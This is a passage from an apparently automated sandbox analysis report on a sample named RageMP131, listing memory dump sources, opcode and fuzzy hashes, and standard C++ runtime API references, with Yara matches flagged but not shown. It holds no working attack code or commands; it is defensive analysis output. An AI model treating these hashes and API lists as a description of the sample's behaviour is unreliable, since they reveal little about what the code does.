                                  • API String ID:
                                  • Opcode ID: 7b77970f9e8fcee6758a64f938827f22be2e38460cee51a8ac6de057d6a43acf
                                  • Instruction ID: e3a858eba69bd30a5145f40299833d2e8b688f5896cab4ebbac88e3796c658ed
                                  • Opcode Fuzzy Hash: 7b77970f9e8fcee6758a64f938827f22be2e38460cee51a8ac6de057d6a43acf
                                  • Instruction Fuzzy Hash: FBF059B768C231DED381999563463F9B762A387630770603BF147E72C3F24416597221
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154297826.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e20000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5537975c92f2fb2cbb89fa818272b957778558c147e6cd8fcbd20bb40d90a455
                                  • Instruction ID: 3910e8ec943571ca86bac916abaecfbf129773280e07aae65dda4708c45cc404
                                  • Opcode Fuzzy Hash: 5537975c92f2fb2cbb89fa818272b957778558c147e6cd8fcbd20bb40d90a455
                                  • Instruction Fuzzy Hash: 0CF0E99728C230EDD242898567047F5BA6563876707706637F64BB66C3F285270D7231
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154297826.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e20000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9cc6e62f0298c5b73f6fa83c2aad5c83153095882054b1d219fb11bf5e8b0b0c
                                  • Instruction ID: c01188cb4e7f7b8ee122a5fef5ccbd013c7d89bc220af1f6ab018eda2f6acd9e
                                  • Opcode Fuzzy Hash: 9cc6e62f0298c5b73f6fa83c2aad5c83153095882054b1d219fb11bf5e8b0b0c
                                  • Instruction Fuzzy Hash: A8F05C931CC230AEE14250956B557F77E6A63872303A16227F64BB35C3A0882B1D7262
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154297826.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e20000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b2a83fff1317cd0d6f5930d36bd55f6ad12caf00d3e827d52414ee58ce4e954
                                  • Instruction ID: 7358e24b86ff419d4e7b4667360230c55271847b6827b8118726401acc3c6f81
                                  • Opcode Fuzzy Hash: 6b2a83fff1317cd0d6f5930d36bd55f6ad12caf00d3e827d52414ee58ce4e954
                                  • Instruction Fuzzy Hash: B9E020C72CC130DDD18150C567553F97A1A63872307B03113F70FB66C3B5882B597561
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154297826.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e20000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34c59dd0859fcb68d87fd67d2486b7fc7f4be0c2e3f5d85a542cb80d76ebe15f
                                  • Instruction ID: 3600a860fe565e4616a1bac3fe66a947f2bf4fdc8df875dab9c304357ba44aac
                                  • Opcode Fuzzy Hash: 34c59dd0859fcb68d87fd67d2486b7fc7f4be0c2e3f5d85a542cb80d76ebe15f
                                  • Instruction Fuzzy Hash: A3D02B8714C030CAC08152D17B522F67B2563576316202123E20FB72C3A4D427997162
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4df2230cf6d2b22dd9929c0dcf2eb738a93c5ed6b64abc4e5fced81a8044e2fc
                                  • Instruction ID: 98ccf139a8a4d5b6bb8807c094869e375602db42d7e2cc9e4b51a062b86e78b9
                                  • Opcode Fuzzy Hash: 4df2230cf6d2b22dd9929c0dcf2eb738a93c5ed6b64abc4e5fced81a8044e2fc
                                  • Instruction Fuzzy Hash: 54023B71E012199FDF15CFA9C8806AEBBF5FF49314F258269D919EB380DB31A9418B90
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0032F833
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0032F855
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0032F875
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0032F89F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0032F90D
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0032F959
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0032F973
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0032FA08
                                  • std::_Facet_Register.LIBCPMT ref: 0032FA15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                  • String ID: bad locale name$">
                                  • API String ID: 3375549084-744497921
                                  • Opcode ID: c7da17e2bf791320939d8630616a2901d5bf520318ede485cf7a94a7ed8fbc3f
                                  • Instruction ID: 848c9dcfc6e38abb142eca5ef7d48ebf4a6ad53e006f9f76193b363c08ef0780
                                  • Opcode Fuzzy Hash: c7da17e2bf791320939d8630616a2901d5bf520318ede485cf7a94a7ed8fbc3f
                                  • Instruction Fuzzy Hash: 7361AFB1D00258DFEF12DFA4E845B9EBBB8AF14710F144178E805AB341EB35E905CBA1
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C3E7F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: @3,$@3,$G>,$G>,$`!,$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2659868963-1824058124
                                  • Opcode ID: a35cf2be4074591dd225ef0c9b237d9c066734985f87b62e2c54f31530a43e87
                                  • Instruction ID: aeeac9620c634ed1c6b9437d40cc3da155b6658ad227f890d80c877a2f21427b
                                  • Opcode Fuzzy Hash: a35cf2be4074591dd225ef0c9b237d9c066734985f87b62e2c54f31530a43e87
                                  • Instruction Fuzzy Hash: 2E41A4B6910205AFCB05DF58C845FEEB7F9EF49310F14CA2EE915D7641E770AA118BA0
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 003A2E47
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 003A2E4F
                                  • _ValidateLocalCookies.LIBCMT ref: 003A2ED8
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 003A2F03
                                  • _ValidateLocalCookies.LIBCMT ref: 003A2F58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: i?$csm
                                  • API String ID: 1170836740-3060081385
                                  • Opcode ID: b9e9f749dd4044be8acf8585c0536db50f70d73dff611b0bdb3c5e5ccea10a1d
                                  • Instruction ID: 43d3631f161a9df51cda3f839ea66e15e4cb7b7f7bad89945d3594a441bd00bf
                                  • Opcode Fuzzy Hash: b9e9f749dd4044be8acf8585c0536db50f70d73dff611b0bdb3c5e5ccea10a1d
                                  • Instruction Fuzzy Hash: B3419F30A00209AFCF16DF6CC881E9FBBB5EF46314F148156E8149B252D731EE55CB90
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C3E7F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: @3,$@3,$`!,$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2659868963-1830230726
                                  • Opcode ID: 1960a754fbad110628dced66654e132ba2cd72f953cb5f37d7ce7e5d525612c8
                                  • Instruction ID: 87725362fa75ff139afb592ef2ea42a8c091f2d3d20d449ca91a7eeba6559391
                                  • Opcode Fuzzy Hash: 1960a754fbad110628dced66654e132ba2cd72f953cb5f37d7ce7e5d525612c8
                                  • Instruction Fuzzy Hash: B921F3B69107056FC715DE58D805F96B7ECAF05310F08C92EFA69CB681E770EA208B90
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C4F72
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C4FFF
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C50C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy$___std_exception_copy
                                  • String ID: @3,$`!,$recursive_directory_iterator::operator++
                                  • API String ID: 1206660477-4040103403
                                  • Opcode ID: f1007800a3f40ddf715a9f33d73b021ffb2d36e7f54076de6c8db678cf6aef89
                                  • Instruction ID: c3df36e84c3e6df68e54e6e440f886dd19e26bb34065404740834babd7423b67
                                  • Opcode Fuzzy Hash: f1007800a3f40ddf715a9f33d73b021ffb2d36e7f54076de6c8db678cf6aef89
                                  • Instruction Fuzzy Hash: B2E100719106049FCB29EF68D855BAFBBF9FF48300F108A2DE41697B81D774A914CBA1
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C799A
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C7B75
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,$out_of_range$type_error
                                  • API String ID: 2659868963-2346395918
                                  • Opcode ID: 89bcd8f281e8e30f4087adecd1507c6131f3705ee8ed7c3b278c332ff666381a
                                  • Instruction ID: d82aae48d67053eaf2eb3db1fcc2e54941fe058f4d4c60fd3960f3ccd8ccd8a0
                                  • Opcode Fuzzy Hash: 89bcd8f281e8e30f4087adecd1507c6131f3705ee8ed7c3b278c332ff666381a
                                  • Instruction Fuzzy Hash: 40C147B19002488FDB19CFA8D984B9EFBF5FB49300F14866DE419EB791E774A9808F50
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C32C6
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C3350
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy___std_exception_destroy
                                  • String ID: +4,$@3,$`!,$`!,
                                  • API String ID: 2970364248-3618221396
                                  • Opcode ID: 2e5aaaa0b8be78889034408fa3b1ea6ddfff7b696db7a329b957ee4552844019
                                  • Instruction ID: fcff9a33369a1ccaff54f113f1dc1e9f7b487d1f19138f880c5f5b4d75ab2852
                                  • Opcode Fuzzy Hash: 2e5aaaa0b8be78889034408fa3b1ea6ddfff7b696db7a329b957ee4552844019
                                  • Instruction Fuzzy Hash: F751BC71A102589FCB09CF98D885FEEBBB9FF49300F14862DE815E7381D770AA418B91
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 002C3A58
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002C3AA4
                                  • __Getctype.LIBCPMT ref: 002C3ABA
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 002C3AE6
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 002C3B7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                  • String ID: bad locale name
                                  • API String ID: 1840309910-1405518554
                                  • Opcode ID: e36aa50c78bc88faadc7ffe906281f20477be9ed329a3cbfbe0a1c52ff1da6db
                                  • Instruction ID: ce7dde66f17cb8d015d71b1639d42a41b8527ce08a15aacfceb127d988bdb8cf
                                  • Opcode Fuzzy Hash: e36aa50c78bc88faadc7ffe906281f20477be9ed329a3cbfbe0a1c52ff1da6db
                                  • Instruction Fuzzy Hash: 2B5180B1D002089FEF11DFA4D845F8EBBB8EF14314F148569E809AB341E775DA14CBA1
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0032DE93
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0032DEB6
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0032DED6
                                  • std::_Facet_Register.LIBCPMT ref: 0032DF4B
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0032DF63
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0032DF7B
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 0e4bff71e461c6a6dcc3bb92afc927025e247c025320dd96e0779962ef1b8e2c
                                  • Instruction ID: 806a0a4ee7a9027488b30f048f0031ac7f78f7ea088439ad973384b94172c710
                                  • Opcode Fuzzy Hash: 0e4bff71e461c6a6dcc3bb92afc927025e247c025320dd96e0779962ef1b8e2c
                                  • Instruction Fuzzy Hash: 2C41F371D00229EFCF16DF54E946AAEBBB8FB04720F254269E815AB352D731AD00CBD5
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C7340
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,$parse error$parse_error
                                  • API String ID: 2659868963-1006035392
                                  • Opcode ID: 84f1e675be7825df6cb832cb9344f00ddac710c93601f56f498d933aaf88a832
